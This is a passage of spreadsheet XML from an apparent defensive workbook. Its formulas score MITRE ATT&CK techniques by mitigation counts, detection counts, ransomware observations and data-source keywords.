        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.36190476190476195</v>
      </c>
      <c r="W145">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>38</v>
      </c>
      <c r="X145">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Y145">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Z145">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA145">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB145">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC145" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD145" s="25" t="str" cm="1">
        <f t="array" ref="AD145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE145" s="25">
        <f>IF(AD145="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF145" s="25" t="str" cm="1">
        <f t="array" ref="AF145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG145" s="25">
        <f>IF(AF145="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH145" s="25" t="str" cm="1">
        <f t="array" ref="AH145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI145" s="25">
        <f>IF(AH145="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ145" s="25" t="str" cm="1">
        <f t="array" ref="AJ145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK145" s="25">
        <f>IF(AJ145="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL145" s="25" t="str" cm="1">
        <f t="array" ref="AL145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM145" s="25">
        <f>IF(AL145="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN145" s="60">
        <v>0</v>
      </c>
      <c r="AO145" s="51">
        <v>0</v>
      </c>
      <c r="AP145" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1190476190476194E-2</v>
      </c>
      <c r="AQ145" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13730158730158731</v>
      </c>
      <c r="AR145" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13730158730158731</v>
      </c>
      <c r="AS145" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT145" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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46" spans="1:47">
      <c r="A146" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1190476190476194E-2</v>
      </c>
      <c r="B146" s="25">
        <f>SUM(H146,M146,V146)*(1+SUM(AE146,AG146,AI146,AK146,AM146))</f>
        <v>0.41190476190476194</v>
      </c>
      <c r="C146" s="25" t="s">
        <v>669</v>
      </c>
      <c r="D146" s="25" t="s">
        <v>663</v>
      </c>
      <c r="E146" s="25" t="s">
        <v>670</v>
      </c>
      <c r="F146" s="51">
        <v>1</v>
      </c>
      <c r="G146" s="51">
        <v>0</v>
      </c>
      <c r="H146" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I146">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J146">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K146">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L146">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M146" s="25">
        <v>0</v>
      </c>
      <c r="N146" s="51">
        <v>0</v>
      </c>
      <c r="O146" s="51">
        <v>0</v>
      </c>
      <c r="P146" s="51">
        <v>0</v>
      </c>
      <c r="Q146" s="51">
        <v>0</v>
      </c>
      <c r="R146" s="52" t="s">
        <v>668</v>
      </c>
      <c r="S146" s="51">
        <v>12</v>
      </c>
      <c r="T146" s="52" t="s">
        <v>664</v>
      </c>
      <c r="U146" s="51">
        <v>26</v>
      </c>
      <c r="V146" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.36190476190476195</v>
      </c>
      <c r="W146">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>38</v>
      </c>
      <c r="X146">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Y146">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="Z146">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA146">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB146">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC146" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD146" s="25" t="str" cm="1">
        <f t="array" ref="AD146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE146" s="25">
        <f>IF(AD146="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF146" s="25" t="str" cm="1">
        <f t="array" ref="AF146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG146" s="25">
        <f>IF(AF146="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH146" s="25" t="str" cm="1">
        <f t="array" ref="AH146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI146" s="25">
        <f>IF(AH146="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ146" s="25" t="str" cm="1">
        <f t="array" ref="AJ146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK146" s="25">
        <f>IF(AJ146="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL146" s="25" t="str" cm="1">
        <f t="array" ref="AL146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM146" s="25">
        <f>IF(AL146="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN146" s="52">
        <v>0</v>
      </c>
      <c r="AO146" s="51">
        <v>0</v>
      </c>
      <c r="AP146" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1190476190476194E-2</v>
      </c>
      <c r="AQ146" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13730158730158731</v>
      </c>
      <c r="AR146" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13730158730158731</v>
      </c>
      <c r="AS146" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT146" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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47" spans="1:47" ht="48">
      <c r="A147" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12493333333333333</v>
      </c>
      <c r="B147" s="25">
        <f>SUM(H147,M147,V147)*(1+SUM(AE147,AG147,AI147,AK147,AM147))</f>
        <v>0.58266666666666667</v>
      </c>
      <c r="C147" s="25" t="s">
        <v>671</v>
      </c>
      <c r="D147" s="25" t="s">
        <v>124</v>
      </c>
      <c r="E147" s="25" t="s">
        <v>672</v>
      </c>
      <c r="F147" s="51">
        <v>1</v>
      </c>
      <c r="G147" s="51">
        <v>1</v>
      </c>
      <c r="H147" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I147">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J147">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K147">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L147">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M147" s="25">
        <v>0</v>
      </c>
      <c r="N147" s="51">
        <v>6</v>
      </c>
      <c r="O147" s="51">
        <v>21</v>
      </c>
      <c r="P147" s="51">
        <v>6</v>
      </c>
      <c r="Q147" s="51">
        <v>4</v>
      </c>
      <c r="R147" s="52" t="s">
        <v>511</v>
      </c>
      <c r="S147" s="51">
        <v>9</v>
      </c>
      <c r="T147" s="51" t="s">
        <v>673</v>
      </c>
      <c r="U147" s="51">
        <v>8</v>
      </c>
      <c r="V147" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.33809523809523812</v>
      </c>
      <c r="W147">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X147">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y147">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z147">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>37</v>
      </c>
      <c r="AA147">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.37</v>
      </c>
      <c r="AB147">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.37</v>
      </c>
      <c r="AC147" s="29" t="s">
        <v>127</v>
      </c>
      <c r="AD147" s="25" t="str" cm="1">
        <f t="array" ref="AD147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC147)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE147" s="25">
        <f>IF(AD147="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF147" s="25" t="str" cm="1">
        <f t="array" ref="AF147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC147)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG147" s="25">
        <f>IF(AF147="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH147" s="25" t="str" cm="1">
        <f t="array" ref="AH147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC147)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI147" s="25">
        <f>IF(AH147="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ147" s="25" t="str" cm="1">
        <f t="array" ref="AJ147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC147)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK147" s="25">
        <f>IF(AJ147="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL147" s="25" t="str" cm="1">
        <f t="array" ref="AL147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC147)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM147" s="25">
        <f>IF(AL147="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN147" s="52">
        <v>2</v>
      </c>
      <c r="AO147" s="51">
        <v>1</v>
      </c>
      <c r="AP147" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12493333333333333</v>
      </c>
      <c r="AQ147" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.19422222222222221</v>
      </c>
      <c r="AR147" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.19422222222222221</v>
      </c>
      <c r="AS147" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT147" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU14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48" spans="1:47" ht="48">
      <c r="A148" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.8266666666666661E-2</v>
      </c>
      <c r="B148" s="25">
        <f>SUM(H148,M148,V148)*(1+SUM(AE148,AG148,AI148,AK148,AM148))</f>
        <v>0.58266666666666667</v>
      </c>
      <c r="C148" s="25" t="s">
        <v>674</v>
      </c>
      <c r="D148" s="25" t="s">
        <v>486</v>
      </c>
      <c r="E148" s="25" t="s">
        <v>675</v>
      </c>
      <c r="F148" s="51">
        <v>1</v>
      </c>
      <c r="G148" s="51">
        <v>1</v>
      </c>
      <c r="H148" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I148">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J148">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K148">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L148">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M148" s="25">
        <v>0</v>
      </c>
      <c r="N148" s="51">
        <v>0</v>
      </c>
      <c r="O148" s="51">
        <v>1</v>
      </c>
      <c r="P148" s="51">
        <v>2</v>
      </c>
      <c r="Q148" s="51">
        <v>6</v>
      </c>
      <c r="R148" s="52" t="s">
        <v>676</v>
      </c>
      <c r="S148" s="51">
        <v>16</v>
      </c>
      <c r="T148" s="51" t="s">
        <v>488</v>
      </c>
      <c r="U148" s="51">
        <v>15</v>
      </c>
      <c r="V148" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.33809523809523812</v>
      </c>
      <c r="W148">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>31</v>
      </c>
      <c r="X148">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Y148">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Z148">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA148">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB148">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC148" s="29" t="s">
        <v>677</v>
      </c>
      <c r="AD148" s="25" t="str" cm="1">
        <f t="array" ref="AD148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC148)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE148" s="25">
        <f>IF(AD148="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF148" s="25" t="str" cm="1">
        <f t="array" ref="AF148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC148)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG148" s="25">
        <f>IF(AF148="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH148" s="25" t="str" cm="1">
        <f t="array" ref="AH148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC148)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI148" s="25">
        <f>IF(AH148="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ148" s="25" t="str" cm="1">
        <f t="array" ref="AJ148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC148)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK148" s="25">
        <f>IF(AJ148="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL148" s="25" t="str" cm="1">
        <f t="array" ref="AL148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC148)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM148" s="25">
        <f>IF(AL148="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN148" s="52">
        <v>0</v>
      </c>
      <c r="AO148" s="51">
        <v>0</v>
      </c>
      <c r="AP148" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.8266666666666661E-2</v>
      </c>
      <c r="AQ148" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.19422222222222221</v>
      </c>
      <c r="AR148" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.19422222222222221</v>
      </c>
      <c r="AS148" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT148" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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49" spans="1:47">
      <c r="A149" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.18524666666666667</v>
      </c>
      <c r="B149" s="25">
        <f>SUM(H149,M149,V149)*(1+SUM(AE149,AG149,AI149,AK149,AM149))</f>
        <v>0.51913333333333334</v>
      </c>
      <c r="C149" s="25" t="s">
        <v>678</v>
      </c>
      <c r="D149" s="25" t="s">
        <v>679</v>
      </c>
      <c r="E149" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F149" s="51">
        <v>1</v>
      </c>
      <c r="G149" s="51">
        <v>1</v>
      </c>
      <c r="H149" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I149">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J149">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K149">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L149">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M149" s="25">
        <v>0</v>
      </c>
      <c r="N149" s="51">
        <v>0</v>
      </c>
      <c r="O149" s="51">
        <v>4</v>
      </c>
      <c r="P149" s="51">
        <v>0</v>
      </c>
      <c r="Q149" s="51">
        <v>2</v>
      </c>
      <c r="R149" s="52" t="s">
        <v>298</v>
      </c>
      <c r="S149" s="51">
        <v>8</v>
      </c>
      <c r="T149" s="52" t="s">
        <v>680</v>
      </c>
      <c r="U149" s="51">
        <v>24</v>
      </c>
      <c r="V149" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.33333333333333337</v>
      </c>
      <c r="W149">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X149">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y149">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z149">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA149">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB149">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC149" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD149" s="25" t="str" cm="1">
        <f t="array" ref="AD149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC149)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE149" s="25">
        <f>IF(AD149="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF149" s="25" t="str" cm="1">
        <f t="array" ref="AF149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC149)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG149" s="25">
        <f>IF(AF149="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH149" s="25" t="str" cm="1">
